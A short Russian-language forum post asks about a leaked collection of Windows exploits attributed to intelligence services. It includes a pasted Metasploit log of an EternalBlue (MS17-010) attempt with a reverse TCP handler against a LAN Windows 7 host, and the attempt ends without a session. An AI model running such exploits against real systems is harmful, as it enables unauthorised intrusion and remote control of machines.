↑
Всем привет.
Кто-то сталкивался с сабжем?
В двух словах: сборка сплоитов под винду, которую стырили у зарубежных спец. служб.
В интернете нашёл описание лишь на 2 сплоита, и то не 1 не сработал в условиях локалки.
Скачать можно было на гитхабе.
msf exploit(ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.0.102:4444[*] 192.168.0.101:445 - Connecting to target for exploitation.
[+] 192.168.0.101:445 - Connection established for exploitation.[*] 192.168.0.101:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.101:445 - CORE raw buffer dump (27 bytes)[*] 192.168.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 50 Windows 7 Home P[*] 192.168.0.101:445 - 0x00000010 72 65 6d 69 75 6d 20 36 2e 31 00 remium 6.1[*] 192.168.0.101:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.101:445 - Sending all but last fragment of exploit packet[*] 192.168.0.101:445 - Starting non-paged pool grooming
[+] 192.168.0.101:445 - Sending SMBv2 buffers
[+] 192.168.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.101:445 - Sending final SMBv2 buffers.[*] 192.168.0.101:445 - Sending last fragment of exploit packet![*] 192.168.0.101:445 - Receiving response from exploit packet
[-] 192.168.0.101:445 - Did not receive a response from exploit packet[*] 192.168.0.101:445 - Sending egg to corrupted connection.
[-] 192.168.0.101:445 - Errno::ECONNRESET: Connection reset by peer[*] Exploit completed, but no session was created.